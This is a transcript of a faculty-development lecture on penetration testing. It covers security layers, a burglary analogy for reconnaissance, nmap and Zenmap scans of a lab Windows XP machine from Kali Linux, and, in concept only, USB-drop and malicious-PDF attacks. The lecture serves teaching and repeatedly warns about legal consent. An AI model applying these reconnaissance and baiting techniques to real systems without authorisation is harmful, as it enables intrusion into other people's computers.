Yes, sir, I'm ready.
Okay. A very good morning and warm welcome to all of you. We are on the last day of our 5 days faculty development program on cybersecurity. Today's session will be handled by Dr. Manish Kumar. To give a brief introduction about Dr. Manish Kumar, he holds a PhD in computer science from Bangalore University, Bangalore. He is working as an assistant professor in the Department of Computer Applications, MS Ramaya Institute of Technology, Bangalore. His area of specialization is information security and digital forensics. He has many research papers on his credit published in reputed conferences and journals. Apart from academia, he is actively involved in research and consultancy. He regularly delivered hands-on workshop, technical talks, and training for engineering institutions, researchers, faculty members, law enforcement agencies, and judiciary. He is technical expert member in various committees formed by Karnataka state government for establishing the cyber forensics labs for law enforcement agencies. He is a life member of Computer Society of India, the Indian Society for Technical Education, Indian Science Congress Association, and member of International Association of Engineers, IEEE and ACM. With this brief introduction, I leave the platform to Dr. Manish Kumar. Over to you, sir.
Thank you, sir. Thank you. So it's indeed a great pleasure and honor to be here today. So my topic is on penetration testing, and I will be talking more about the tools and techniques, and we'll try to touch upon the fundamentals that how it's so easy to hack the system, and what are the tools available in open internet. Most of those tools are open source, and some of you might be knowing already, or many of you might have explored these tools, probably. I'm not sure, but okay, students are very much interested to use these tools and techniques. Uh, Nowadays, faculties also are getting little awareness about these tools, how they can use in their research activities, and how you can do experiment in regular class for the network security subject. So bunch of tools are there. It's in thousands and thousands. Really, it takes a lot more time to get expertise in each and every tools. It's not so easy, or you can say that not all tools for every for all the domain. So these tools are meant for specific purpose, and people are working in various domains. So somebody is working on web security, somebody is working on network security, or you can say that like database security or something like that, cloud security. So for every purpose you have a set of tools. So you have to know much about the tools which is useful for your domain, so that you can experiment the real life scenario, and really you can generate some good results for research papers and all. And the best thing is that most of these tools comes open source. Now, the only thing is that you won't get you so rich interface, user interface, because it is open source tools mostly in the command prompts. So you have to get some manuals and then you have to read. So people has to have little patience to get expertise in the tools, and obviously you need to set up your environment to experiment those tools. Because whenever I take such workshops and class, the first security warning I give to everybody that don't try to do it in real live scenario, live environment. It will create problem for you or for your organizations, because these tools are slightly offensive tools. Okay, so even then when you are teaching in class and your lab, you should be a bit careful that you give a security warning to your students, and make them aware that what may happen if uh, they try to use these tools in the real life environment, and they may land in a trouble. So that's very important to inform before we start the lectures or the lab hands-on, because it will create little bit of legal complexities for them if someone take seriously. And obviously most of the time what happens, the students are very energetic, and they don't think all those the cons early before experimenting, and then it is a bit difficult situations for them. So it is we have to inform them before. Fine. So first I will start with the penetration testing. I will try to give you little bit of idea about the penetration testing and security, and then I will try to move on uh, Kali Linux and some of the tools in the Kali Linux, and then I will give you a little idea that how actually attacks can be done and how actually it works. And the approach will be similar for all types of attacks. So the basic idea is to give you a little insight that what is the approach of doing attack. Okay, and then we will cover some of the professional tools, and the last I will try to cover with some online resources, which is a very good resource for conducting network security labs, or even if there are somebody who is pursuing the research. So very conceptual contents are available on the net, which is not just like some kind of online tutorial like Udemy or some ethical hacking course. It's not like that. It has a in-depth content which can be which you can take, and obviously it takes a lot more time to go through those contents. For one lab sessions you need to a lot more patience and time to do it. But yeah, when you do it, your fundamental concepts of computer networks and security related things get clear. So I will try to show you those resources. Some of you might be already knowing it. If you don't know, you can take it further. Then I will try to touch upon little on the research topics, that what side you can concentrate if you are pursuing research, or you have planned to do research on that, or someone is approaching to do research. If you are trying to start, then what topics or things can be taken forward. Okay. So well, the sessions I will continue up to 11:30. In between, I will try to stop and take the queries, and you feel free to ask anything. Let us start now. So I am running my system. My virtual platform is ready. So there I will try to experiment something, and in between, if you don't get I will share my
Excuse me,
screen. Yeah,
sir.
I'm sharing.
Yeah, okay, okay, fine.
So it's visible now, right?
Yes, sir, it's visible.
Yeah. Okay. So in between, I will try to take the questions. Feel free to ask anything. Objective is not to push up all the content. Objective is to whatever I share with you, you should take it. You should understand it properly, and it should not be just like I'm just going through the content. So if someone is little slow, I will go with your pace. Okay. Okay. So I have my yeah. So my PPT is visible, right?
Yes, sir.
Yeah. Okay. Fine. Thank you. So penetration testing, you breaking in before the bad guy. So most of the people talk about ethical hacking, but I personally don't say the word ethical hacking, because hacking is hacking. It cannot be ethical at all. Okay. So when you say that the intention is to test the security of the system, then the nomenclature for that is slightly different, and we say it is a testing, it is not hacking. So when you say you want to test the security of your system, then you have a well-defined word, and we say it's a penetration testing. So even if someone is searching job for the security related domain, you won't find normally openings with the title ethical hackers. Okay, some companies may give that kind of fancy name, but mostly it comes with the title like means designation like penetration testers. So that's the standard word which is used, and even if you want to search the resource on the internet related to this, you will mostly get with the title penetration testing. So that that punchline itself say breaking in before the bad guys. So you break the system before someone else break the system. So you have developed your system, you test how secure it is. So there are different kind of penetration testing, because the softwares are of different uh, categories. So you may have a mobile apps, you may have a apps which is very much based on the database or cloud based, or you have a web applications or network applications, or different categories, embedded systems. So first of all, we need to see that you are looking for what you want to test, what kind of system. So it's not that you have a one tool to do all type of job, and that's what is very important to know. So when you will go through these kind of workshops, or when you go through the content of this workshop, you will little know about that for every specific job we have a set of tools. So in this conference, basically I will be concentrating more on. So I just wanted to make it very clear now that my more focus will be on the on penetration testing for the networks. Okay, I'm not going to touch more on the web or database or other things, but approach will be more or less same. Okay, when you go for the web penetration testing, you have slightly different approach, because there again you have to see the coding patterns, because the script is written in Perl, Python, Ajax, or whatever, so or JavaScript. So when you scan the website, you get the vulnerabilities on particular script or maybe particular file, and then if you are a good coder, you know that okay, this way of writing the code is not proper, and it can be exploited, and you can pass some extra parameters, and you can extract something from the what you say that destination system or the server. So that's all possible. So what I mean to say that the very very big domain, and mastering in all is very difficult. Similarly, if you're trying to penetrate a mobile apps, so which mobile apps, whether it is Android or iOS, so when you scan the system you get the vulnerabilities, and if you are scanning iOS mobile apps, so obviously when you get the scanning result, you should aware about that. Okay, what is the coding patterns, and how weak it is, and what can be exploited. It's like a doctor who is a ENT specialist, and he take this scanning of his stomach, he won't be able to diagnose much because he is not expert of that. So you have the doctor for all the different specializations. So you won't go to get a stomach pain, you don't go to show your stomach pain to a ENT specialist, and the ENT specialist cannot diagnose it. So it's like that. So I hope it's clear for you that what I mean. So I will be quickly moving with the slides, because the slides are huge, and it's not required for everything to discuss here. I will be just touching upon the basic things which is required for these workshops. These are my standard slides I am using for various other workshops. So we'll be touching on based on the time availability I have, and the topic which I want to cover. So don't worry too much if the slides I'm skipping, and don't worry too much about the writing of commands and all, because at the end I will be giving you all the resources I will share with the organizer, and everything is available on net. Okay, you can download it, and you can take your own time, you can go with your own pace, nothing to worry, just try to understand the concept. Okay, take it lightly, don't stress too much. So type of security assessment. So what actually we do when we want to attack on the system. So the first thing what we do is scan the system for vulnerability, and then test the system. And why do we do that? What is the reason to do vulnerability scanning? There are various reasons. So for example, you are the administrator of one lab and you need some kind of firewall or some kind of security software, so you need to propose that to your boss, and your boss may ask you, why do you need it? I have hired you for what, if you want all this kind of software every time you come for so much a requirement. You need to prove that, see, these are the weakness in the system, and if you don't give me this kind of software or infrastructure, I won't be able to protect your assets and you will face problem. So how will you prove that? So to prove that, you have a professional software, which actually the job of these professional software to scan the assets and identify the weakness of the entire IT infrastructure, and that can be shown to the higher body or your higher level managements to convince them that these are the problems and you need to handle it in certain way. Okay. And there are obviously there are other requirement also. For example, suppose you are a banking organizations, and a RBI committee is coming to see, for example, in college and institutions, the NAC committee, NBA committee, UGC committee keep visiting to see that you are following a laid down process to impart teaching to the community. So you have to show so many documents, so many details that you are following the norms, whatever is prescribed. Same way, when the organizations is having a IT assets, for example, if it's a banking organizations and they are giving online banking, mobile banking, or so many kind of facilities to the customer, so RBI or some kind of statutory body may ask you, are you following the norms which is prescribed for maintaining the IT infrastructure? So then how will you prove it? So you need to do your audit, and you need to show that you have got your audit done from the professional people or the expert, and you are secure enough, so you are following the norms. And that's how where it's required. Not only that, suppose you are a software developer or you are a bank organizations, and tomorrow take an example, you are a okay um, you are a bank organizations and you are going to launch tomorrow a mobile app which gives you option for all type of transactions. Okay. And mostly all of the apps nowadays giving you options, so not rarely people are visiting the bank branch nowadays. So you got the app and you are going to the bank is going to launch the apps tomorrow. So before launching the apps, it is very important for banks to just see that how secure the app is. You can imagine if there is a loophole. Hello. So kindly, yeah. So if the app is not tested well, and if it is launched in the market, you can imagine what will be the effect of that app. Okay. uh, you can lose $1 million and more than that, we don't know. So it's very important that when you launch a product in the market, you are very much sure that your product is well tested. So testing in a two type, one is a functionality testing, which normal testers will do, but when it comes for the security testing, it should be very hard built. So it has to do all kind of stress and penetration testings. Try every possible way you have. Try all the permutation combinations you can to break the systems, and then when you could not, then you can say that yeah, it's secure enough. Who will do that? So obviously you need a very good expert who know how to crack such kind of systems, right? So how does net so what is important before I moving to this slide, I'd like to show you this. Yeah. So whenever the people talk about security and uh, anything related to the security, I just wanted to ask them that you be precise that you are talking security in which context, because security is a very broad terms, and uh, you need to be very clear that you are touching upon which aspects. Okay. So for example, if you see this layer architecture, so this is very easy to explain you the different layer of security and aspects how it works. For example, if your computer itself, if you see that you have physical security of your computer, so You might have locked the chamber, nobody can access the chamber. So obviously if it is locked, you cannot get inside of the chamber to switch on, even to touch the computer is impossible for you. In my lab, I have my server where we have the projects for the DST we are doing. So the server which I have, it is locked from outside. So even someone come to the chamber, they cannot switch on and switch off the server because the front side of the server is locked with the physical key, and the key is with me. So only when I open the chassis from front side, I can switch on it. So that gives the physical securities. Or there are various other way of to give the physical security, perimeter security, where you have kept the system, your locations or your environment. What about the network? So when my system is very much physically secure, but obviously the data communicated from my server is through my local network. So that local network is very big. So in campus, we 5,000 of computers, and we have a fiber optics cable, we have LAN, we have Wi-Fi, so many interconnections, and so many gateways, firewall, routers. Obviously the data goes from various route, I don't know, and if that is weak, so someone can, no one need to get a physical access on my computer. The interest is on data, right? So they can access my computer through that way instead of coming directly through access the computer physically. So again, I am vulnerable if my network is vulnerable. Physical security do not provide me any security now, so it is waste. So obviously you need to see that how network is secure. Okay, fine, suppose your network is secure, but the operating system which you have installed in your computer is not secure enough. You have some kind of old window operating system which you have not patched properly, and then there is a possibility that when you are browsing your system or you are accessing some files, you got infected through some kind of malware, or someone could access through what you say, that kind of malware through emails or from some kind of files which you access on computer, and you got compromised. So it's possible, and it's very sophisticated kind of attack nowadays. Even if you try to open a website, it's quite possible that with the website itself you get some kind of malware, and which has got access on your computer, and then the connectivity is continued as long as it's possible. Okay, we will see that how these all things could be done through the softwares, I mean to say through various tools. Okay, so your host is okay. Suppose your host operating system also is secure enough, then what next? Your application. So what actually runs in your computer? So operating systems gives the platform. If the operating system is weak, obviously it's possible to get access into the computer and much can be done. Okay, that is also secure. Then what next? So you install various applications on your computer. It may be a database software, it may be a word processing software, or some kind of image processing like Adobe or something like that. So you have some MS Office, you have Adobe, you have uh, MS SQL or Adobe Reader. These are specific applications for a specific job, but I don't know whether you know it or not. If I want to access your computer, I can access through the application. So you have a PDF reader, and the PDF reader has a vulnerability. So I can access your computer through PDF reader. So if you have installed a PDF reader and it has some kind of weakness, I can get access in your computer through PDF reader. Or suppose you have MS SQL installed in your computer. So MS SQL has vulnerability, I can get access in your computer through MS SQL. So you can get an access into the computer through various ways. It's not only through the network, it's not only through the physical way, or it's not only through applications. Okay, so you are kept vulnerable, you are vulnerable on various levels. So that one is applications, and the next finally comes from the data. What actually we do with the data? So data you might have copied in your pen drive, you brought it from somewhere, and you are having an Excel file, or you have some PDF file, you have some Word file. Most probably what happened when you get infected in your when you infect your computer, so you might have brought pen drive from your friend's house, or you might have connected your pen drive in some college computer, and the moment you connect to the desktop, the quite possibilities that it got infected with the virus because you brought it from somewhere and got infected. It's like, how coronavirus comes, we don't know from where we got and from where who got. So you just attach your pen drive and you don't know which computer actually pumped the, what you say, that pen drive, and then when you connect back to your laptop or computer, it is spreading there. So it comes from the data also. So there is various way to compromise the systems. Obviously, we are not talking about the physical security and perimeter security, that is physical, and it's not in our control to see much into that. But when you say that your firewall, internal network, host, application, and data, there you need to take care. I mean to say that obviously the network administrator or the software engineer or the security expert who is designing or developing these things are responsible to see that these should not be breachable. So what is the uh, outcome of these whole discussions of these layers? The outcome is uh, you patch the security in one layer, but if you left the other layer unpatched, overall security is still not achieved. So it's not that only you can make your network very secure and left other layers unsecured, you will get the security. No. So any layer, if you are unsecure, finally will be compromised. So when you look at the security aspects, you have to be very clear that you need to patch the loopholes in all the layers, or else final outcome will not be achieved. Okay. So why to perform penetration testing? I've already given an answer. So what it is and how we start the penetration testing. So using penetration testing, you access network security. So how actually when you talk about the penetration testing, the most important thing is that approach. How actually this works? Uh, how actually the attacker thinks about attacking on the system. So what is their approach to attack? That's very important to understand. So wherever I go to, I give the lecture, I give these examples. Uh, when you have left your house, mostly you will see that in and around your location, in your neighbor, uh, if there is any theft incident happens, mostly it happened in the house where nobody was left, nobody was there. Maybe the owner of the house has gone somewhere out, and nobody in the house for quite 2-3 days or 1 week. Mostly you will see that any incident happen or theft happen will be in that kind of house, and it won't happen in a house where people are staying. So the moment you leave for 1 or 2 days, possibilities of such kind of incidents. The question is that how it happens, how they came to know that nobody is at home, who told them. So this is a very curious question. So the answer is that these people are in continuous observation. So they might have come in and around to the house. They are always scanning. I'm using the word, please mark it, scanning. So they are scanning the localities, which house looks like empty or nobody is there. So how do they identify it? So most probably what happens that I'm giving you some kind of information that how they do it. So normally when you go out of your house, so what happens that your house, all the curtain will be pulled properly, light will be off, even at the 8 o'clock evening light will be off, which is not usual things, right? If somebody is staying at the home at evening 7:30, 8 o'clock, definitely light should be on. All the gates are and door windows are properly latched, locked. It's not opening since last 1 or 2 days. The newspapers and milk pouches are kept outside or lying. No vehicles are visible outside of house for 2-3 days. Everything is parked inside properly. Nobody has cleaned the front area of the house. These are the observations they note it, and then they are very much clear that this house the person is not there. and then they come up night with their all tools and things. They break open the door and then get inside the house and take away that whatever they want. So what they did, they scanned and they identified, okay, this house, they find the target. And when they found the target, then the next thing is that, okay, to how to enter in the house. So to enter in the house, they need to find out again the point from where they will enter. So obviously you won't see that if there is any theft incident, they have came into house from roof or from bottom. They won't break open the wall. What they do, they normally break the door and window where you have a weak kind of lock, or the door and window is not so strong. So after identifying the target, the next approach is to find out the weak point from where they can enter into system, we can enter into house. And then they again apply their mind, they scan, and they identify, okay, this wall, this door or this window or this place is good enough to break, weak enough to break, and then they can get inside. So the question why I'm relating this with penetration testing, how it is related with the penetration testing. So the approach is same, it's not different. So here what happened, these attackers actually, they have two things: either they know very well the target, or they need to scan the target. So if someone may ask me that, okay, how they know the target. So for example, uh, I want to attack on a bank's server. I don't know the IP address of bank server. Then I need to do thorough scanning. But I want to attack on one top level bureaucrats, government bureaucrats. I know that person very well. Only thing is I don't know which computer is using an IP address of the computer. So the approach of attacking these two is totally different. When you talk about the bank, it's a very big organizations. Which computer actually you want to attack? You need to do thorough scanning, and approach will be bit complicated. So here I want to attack one person, and he may be using one or two computer in his office or home or his personal laptop. So my target is very clear, and the scope of scanning also is small, it's not so big. So the approach will be slightly different. So when I talk these topics, I say no matter whatever software and tools you use, if I want to attack you, I can attack you, and you will not be able to defend yourself. And if someone is really behind to crack, if he has well planned to break your system or to break your laptop, you really cannot defend. It's very difficult unless until you are very, very conscious. And the most important thing is, it is not that software can protect you, it's your mind and your activity, your the way you use the system is more important, that can protect you. So I give an example, that for example, you are a very you are a very conscious man, okay, you are IT security expert, you have done your masters and PhD in information security, you have learned so many subjects, fine, everything is fine. But when it comes for the practicing, as a practitioner in a real life, you may have some problem. So just a minute, just looking for my system in between, because I have executed some process, so I wanted to see that it's working or not. Yeah, so okay. So I was talking that what happened to the people when they so you have done your masters and PhD in security, fine. Suppose I want to attack you. I know you are a very conscious man and knowledgeable and expert in this domain. So what shall I do? I need to plan a particular attack for you. I'll give an example. Most of you, when you go out of your house, suppose you got one pen drive lying in outside of your door, uh, what you will do? What is the normal activity of a common man? So if you found the pen drive, will you just take it and throw it in a dustbin? 99% will never throw it in dustbin. He will be very curious to see that what, okay, first he will see which pen drive, how much size, 32 GB, 64 GB, is excited. Today my day was very good. I got 64 GB pen drive free. Fine. He took it, and then obviously the next interest will be, let us see what is there inside. Though he got it outside lying down, he don't know from where it has come, but he's interested to see what content it has. Fine. So what you will do that you will take it and connect in some computers. The moment you connect it, it has infected your system. No matter whether you have firewall or antivirus or anything. Remember that antivirus has its own limitations. Antivirus cannot detect the malware or virus of all types. So if someone has crafted a new virus just for you, for yourself, a very new kind of virus, deadly, to attack you, 90% chances are there that your any antivirus which you have used may not be able to detect it, and you are compromised. So the moment you connect this pen drive to the computer, it's over. And the next attempt required is that just you hook up with the internet. So that's done. Now I actually didn't knew that which computer you were using. I actually don't know the IP address of your system. I don't know anything about your IT asset. I only know you, and I know where you stay. So, and I know how weak mentally you are. If I do such kind of things, what will be your reaction? So I intentionally drop the pen drive in front of your door, and then I know that you will pick it. I know that you will attach it to the computer, and it's gone. And that's how the things works. Okay, so there is quite number of possibilities to attack someone, and we say it's and this is not taught in the syllabus and the lectures. It's come with a vast experience, and you need to go through various case study that how it was planned, how it was attacked. So quite possible that someone can craft such kind of attack for individuals, and it's really very difficult for you to escape. Just take an example. I'm giving another example. You are a head of the department of your department in college, and you have all the question papers on your system. The students know very well that this person is having everything in his system. So if I get an access on his systems, I can get anything. And definitely one or two notorious students will be there in the batch who will be trying to doing all these things. Okay, so what he did that he know it not so easy for him to to do phishing with you or to compromise your system. So what he did that, okay, so there is some kind of, suppose some kind of event is going on in your department, maybe a tech fest or maybe a student fest or maybe some event. So these guy, what they did that they said, sir, we have designed a invitations. I just wanted you to look into this. And he sent a PDF file to you through email or something. And it's quite possible to attach a piece of vulnerable code in the PDF file, and the moment you download and open it, it got executed in the background, and that's enough. Once it is executed, uh, and if you do not detect it, your computer is connected to the attacker as long as he want. It is not in your control. Your control is only when you know. If you know, that obviously you can remove the malware and you can disconnect. But if you didn't knew, as long as possible, he can maintain that connection with your computer. Whenever your system will be up, he can hook with your system and do anything whatever he want. Okay, so directly neither he has given you pen drive nor he asked you to do anything, and you never felt that this is the way they entered into a system. So what is the prevention there? The prevention is that you are not supposed to use such things on the system where you have a critical assets. So if you would have used these PDF files and emails in your normal laptop where you don't store your sensitive files, then okay, no problem. But when it is a examination related system where you have very sensitive informations, there you should not try to access a unknown files or any unknown things. You should not attach, and normally try to keep distance from the normal networks, try to be away from the normal networks, or connecting this system directly to the normal networks, so that the lesser the communication, the lesser the chance of attack. Okay, so practically it's not possible, but yeah, in real life, if you see, most of the critical infrastructure, whether it is a defense lab or it is a ISRO, NASA, or any organization or nuclear research lab, so there's a concept called airtight system. They maintain the system in such a way that the system will be completely out of normal network reachabilities, and they are completely disconnected. So accessing those systems are practically impossible. And if it is connected, if it is connected anyway through the outside world, then obviously the chances of compromise is definitely too much. So they cannot take that much risk, so they definitely keep it out. Okay, so I think I have given you enough background that how the attacks is possible. So I told you legal issues before you start. So when you do the penetration testing and when you teach such kind of subject, please make your students aware that uh, particularly in India, see, when normally I have seen many of my students, they try to find out some kind of bugs and weakness in some websites. So always there is a policies for that. For example, you might be knowing there is a bug bounty for various well-known websites like Facebook, Google, Amazon. All they give a reward if anybody has found some kind of vulnerabilities on those systems. So there is a proper policies, you can find out, you are free to find out the bugs, and there is a proper way to report the bugs to them, and if they found the bugs is genuine, they will give you reward. But unfortunately in India, I have not seen this approach is taking properly. So if your students suppose try to find out bugs in the government sites or government assets, so they, some of them may take it in a negative way, thinking that they try to hack it. So unnecessarily you will land in a trouble. So what I suggest that if at all you are interested to find out, kindly take a written consent from them that they are allowing you to find out the vulnerabilities, and once you have the written consent, you are out of risk, or else be ready for any type of consequence. So your intention may be correct, but proving that your intention was correct will be very difficult, and you will face unnecessary trouble. So I'm just going inside of the tools. Yeah. So how do we do the penetration testing? How we start this, start the work if we want to attack on someone's system? So the first thing is that scanning. Okay, and I told you that if the hackers, I to give the example that if there is a theft incident in your neighbors or in your house, so the first thing they did the scanning. So they came in and around, they observed the things, and they identified that yes, there is nobody in the house, and then they made the target. Yes, this house is the soft target to attack. The same thing happened for the computer. So when someone want to attack your system, the first thing they do that they do the scanning recons. So how do we do that? What actually is the objective to do the scanning, and what is the outcome of the successful scan? So the scanning is actually the process where, as I told you, there are two types of approach. One where you know the target, and one where you don't know the target. So if I know your IP address, I can, you normally you know how to ping the systems, right? Like that, I can do a there is a tools available which can help me to do the scanning of the target systems. Okay, and that will give me a lot more details about the target system. So let me quickly show you how actually we do the scan, and I'll come back because system is sensitive. So this is my Kali Linux system, and I'm running another target system is the Windows XP. Okay. So Windows XP IP address is 192.168.133.131, and my Kali Linux IP address is 192.168.133.130. So the only one difference, 130 and 131. Okay. So Kali Linux is the attacker, and Windows Linux is the target where I want to attack. So normally what we do when we want to attack, so we first do the scanning of the target system. So here I know the IP address of my target system, so I have no problem. So what I will do that I'll just run the command nmap 192.168.133.131. So I'm sorry I cannot increase the font, but not to worry. I'm using nmap. Nmap is a well-known command. Okay. So I'm just running the scanning, and once I have executed it, you can see that I have got this. What is that? The port number which is open on the target systems, and it is showing me port number 21, 25, 80, 135, and these ports are open on the target system, and it's also showing the services which is running on the target system. So hold on. So I just gave you the one idea that okay, what actually we did. So we just tried to do the scanning of the target systems, and what we had only one detail about the target, that is IP address. Having IP address, I could find out what applications or what process is running on the target systems, and uh, and that is not sufficient. Actually, it's not sufficient for me to go inside. I have to do little more work. So it is like, okay, uh, so some people may have the questions that how did you came to know about the IP address? So the question is genuine. How do I know the IP address? So there are two things, when you say, for suppose banking systems or various well-known assets, or any institution and organization system. So most of them, they have static IP address. So there is a easy way to get the IP address if you go through their websites and all. And I will tell you a little more that what are the other way to find out the IP address and do it. But most of the time what happened, the system is having a static IP address. You can do it, but again there is a problem that if it is behind the proxy server, how will you do it? So it's not so easy. For if it is a proxy server, then obviously it is not so easy, but then you have to hack the gateways, or their gateways where actually all the communication emerge. But you have to find the approach. What if the system IP address keep changing? How do I know it? So for that, I told you, I give the example where I don't know the IP address, then I may send you some email. I may send you some file through pen drive. And the moment you connect your system through that pen drive or email, or you read my email and download the files, your system will connect back to me. I don't know your IP address. So I have sent a piece of code which is running your system and connecting back to me. So that is possible. So both approach is possible. One, when I know your address, I can attack, and when I don't know your address, then also I can attack. Okay, fine. So I was talking about that you have scanned the IP address and you got the port number. The port number is sufficient. So first thing you need to understand what is port number. I hope many of you are very much clear about the port number. So while giving an example, I told that suppose the thief is trying to break open your house and get inside. So from where he will enter? So mostly he will enter from the door or windows. So port number is also like a door or window in your computer. So if I just relate the very simple way, IP address is the door of your computer. So it is the destination where the data should reach, but not the final destination where the data should reach. So in your computer, various processes running. So you might be running your email, you might be running some kind of what you say, YouTube or Facebook or some other applications in the background like Google Meet or Zoom or Team, Microsoft Team. So all these applications has separate IP port number, right? So as I was telling from morning that I can get access in your computer through a proper applications, and not only that, even your operating system is using various port for various things. For example, you run your operating system and suddenly you see that you got an message, updates are ready, Microsoft Window updates are ready. How do you get it? So definitely some process is running in a backside which is connecting to the Microsoft server, fetching the details, communicating on behalf of you behind the scene, and definitely when it is communicating, it is open on certain port. So there are various port which is used by your OS for regular job, for maintenance work activities and various things. And there are various applications which you have installed. They are also using various port. So the question is why I'm talking about port. So I told you that my main objective is to get inside the system through networks, and the networks possibilities to get inside the system only when you know the IP and port. Just having the IP address is not sufficient, because IP address will bring you up to the system, but you need to get inside of the system. So that accessibility is only through certain application and port number, right? So you could find out here which are the ports open, but you are not much aware that more details about the port. So you could only see certain port numbers. So there are three types of port. One is closed port, one is open port, one is filtered port. So closed port means no, there is no such process running on that, so you forget it. uh, Open port, which means the system is listening on those ports for communication, so that is a soft target for you to start attacking. And there is a third, filtered port, that means it won't respond to the unknown person, it has some kind of restrictions. So only a specific IP address with certain kind of accessibility are allowed to communicate on that. So most probably 99% you will try to access on the open port, because that's the easy target for you. Filtered port, it depends. If you try to do spoofing where you forge the IP address, and then if you know which IP address is authorized, and you are try to imitating the communication using those IP address, then yeah, possibilities to get access and do something, fine. So okay, I hope it's clear for you that why port number is important. So the first thing when you start the attacking, the first thing you need to do that you need to scan the IP address, and then you need to get the port number, and then you can go to next. But just knowing the port number is not sufficient. Why? Because suppose I want to attack on one computer, I know which operating system is running, so he's running window, but I really don't know that which version of window is running, whether it is window 10, or in window 10 itself there are various bundles and various upgrades. So which upgrades he is running, I don't know. Or suppose he is running Microsoft Office, so or MS SQL. So I know there is a vulnerability in MS SQL, but I don't know which version of MS SQL actually is running. So I cannot craft my attack. So it should be very clear for you to understand that when you want to attack on the system, just knowing the port number is not sufficient. You need to go in more detail to find out which application is running, which version of application is running, and then you can do something more. Okay, so let me go to little inside, and then I'll try to show you one small tool. Yeah. So this I just could find out little detail, but not sufficient. So we'll try to do little more. Okay. There is another command, genmap. So genmap is actually a GUI based command to. Okay, I will run it in. Okay. So we'll give the same target address 192.168.133.131. You have option, various type of option, intense scan, quick scan, all those things. So I'll go for intense scan and see the results. So it has discovered the port, so it's still running. You need to wait for some time to see what output it gives, but we'll see that. Okay. So for every job you have a bunch of tools to do, and Kali Linux is open source operating system which is meant for this purpose, and basically it is used for testing purpose and for security related things, but it become very popular among the hackers. You developed a weapon to protect yourself, but the same weapon is used to destruct you. It depends on the individual minds that how they want to use it. So there is no, we can't stop it. But so many places, whenever I teach this, the people ask me after seeing this, that if it is so deadly, why it was developed. So it was not developed to destruct, but yeah, society people are there who use it in a negative way, so we can't stop it. Fine. So the result is coming. It takes time. It go with the intense scan, so it has to do various kind of scanning, and the detail will come. So we'll wait. We'll continue the lectures, and we'll come back to the PPT to this. Okay. So we are still in the scanning mode where we are trying to find out what kind of details we can get, and then we can try to attack it. Okay.
Sir, I'm sorry to disturb you, but the voice was breaking, sir. Can you just?
Now is it okay?
Yeah, it's visible now, but what you said wasn't audible.
When sir?
Just now, just before a minute. It just started the ZenMap command, right, sir?
Okay. So now the voice is clear.
Yes, sir, it's audible.
Okay. So what I said in the GenMap is actually a GUI tool which is actually in a background using the Nmap command, and whatever we did with the Nmap, so we could get little details. You can see we got only this port number, and the problem with and this is all our command based tools. So what happened that you can do much things. Now voice is clear, right?
Yes, sir, it's audible, it's clear.
Yeah. So what happened in Nmap, you can do all those things whatever you want, but the thing is you need to remember all the options of the command. So there are various parameters, and it is very difficult for someone to remember all the parameters and do. Even if you go with the Nmap, you can search on the net, you will get complete manual, and is Nmap itself you can do various kind of experiment for a week together. Okay, but our objective is very simple. It is not mugging up something. You have to do smart job. So if you want to do in a smart way, then you have the option GenMap, which is a GUI format of Nmap, and you need to just give the target IP address, and there are various option of doing the scan, various type of scanning you can do, and here it goes. You can see the result. We got much details if you see compared to Nmap. So it is not simple scanning. You got the port number, what are the ports open, and then it is also showing that okay, port number 21 TCP open, and it's using the FileZilla FTPD 0.9.32 beta version, and SMTP is open, the version number is given. Okay, then TCP open, Apache HTTPD is Apache is open, then Microsoft Windows RPC, Microsoft NetBIOS SSN, then you are using XP version, MS SQL you are using, the details of MS SQL is also coming here. So you got a bunch of informations, which is a treasure of information. The more informations you have, the more clear you can do attack, right? So that's the power of these tools. So we started with a simple scanning, having one single IP address. We got little port numbers details. Then we slightly, voice is clear, right?
Yes, sir, it is.
Yeah. So we got little port details, then we moved on, then we tried to scan further in detail, and we got more detail about your operating system. We got more detail about the various applications running on your system, and we also got the detail of your version of the applications running on the systems. So okay, now you have much detail about your target, right? So there are two approach to get the informations, that one is active scanning and one is passive scanning. So someone may ask me, what is active and passive scanning? So when you did the scanning, that it is all a computer science concept, and people should go inside and try to understand how this scanning tools is getting the details. So for example, I don't know your name. How do I get, how I will come to know your name? First time I'm meeting. The one thing is, I will shake my hand with you and I'll ask your name. But the moment I ask your name, you also know about me. You will also ask me the counter questions, that what's your name? But my intention is not right. I want to do something harmful for you, so I will try to hide my identity. So hiding my identity, how do I get your name? So that is the only option left, is that I should not directly communicate with you. I should talk with somebody else who has spoken with you. So if there is a group of 5 people, so directly coming to you, it will be a problem for me. So what I will do, I will talk someone else who has spoken to you and get information about you. So same thing happen in the scanning also. Try to understand, when attacker is trying to scan your target system, he will never try to reveal his identity, because there is a possibility that target system have sufficient security software which is recording the IP address, whoever is communicating. So the moment you send a request, the IP address is recorded and your identity is recorded. So in case of any incident, you will be probed. So if one identity is revealed, then you will be probed and you will be in a problem. So if I give a simple example, a terrorist is going to attack somewhere and he is driving a car. 99% he will carry the car with a false forged number plate. So even if anywhere in the CCTV footage it is recorded, you cannot trace him back, because this all identity is forged. Everything whatever is carrying is forged. So tracing them is difficult. Same thing do attackers also will do. So in passive attack, what happened, that passive attack means, passive scanning means they will not reveal the identity, but they will get your information. And active means they will directly connect and get. But normally if you go for the scanning, the first thing is, the successful scanning is, the scanning is only called successful when your identity is not revealed. So how will you do that without revealing your identity? So you need to go in the fundamental of TCP IP protocols and various protocols, that how actually communication takes place. So I give a very simple illustrations of that these are the weakness in your protocols and you have no option to protect it. Okay, so given a simple example, suppose someone is staying in your apartment and you don't know his name. Someone has come next to your door and you want to know who all are in that house and what is their name, but you don't want to directly go and knock the door and ask. So what is the option to get the details? The best option is catch hold the postman who deliver the letter post to all the houses. So if you observe it for a month, and if you see the envelope, you will get the name with whose name the letters is coming in that house. And it is not possible to deliver any letters to the house covering the to and from address. Same thing happen in the computer networks. Data cannot be communicated encrypting the to and from address. That is a VPN concept, but still, even if you go somewhere, to and from address must be open, otherwise it cannot be processed by in between router and gateways. So you can't hide your to and from to address and from address. So what is there in a to and from address in the packet? So you have IP address and your port number. The moment IP and port is revealed in the packet, then I know very well, okay, which applications is running on that computer and which IP address is communicating on. So if I observe it for certain time period, I got the complete detail that this computer is actually using these port numbers, which is, or these applications, and that's how I can collect the information. So this is a passive listening on the networks. Okay, and the two people who is communicating will never come to know the third person is observing the networks and gathering the information. So don't have a actual solution for it. So only the solution what you can do that encrypt the communications. But okay, even if you encrypt, somewhere it has to be decrypted, because not everything can be encrypted. Some basic information, that what I said, that header of the packet, where you have some very vital information like port and 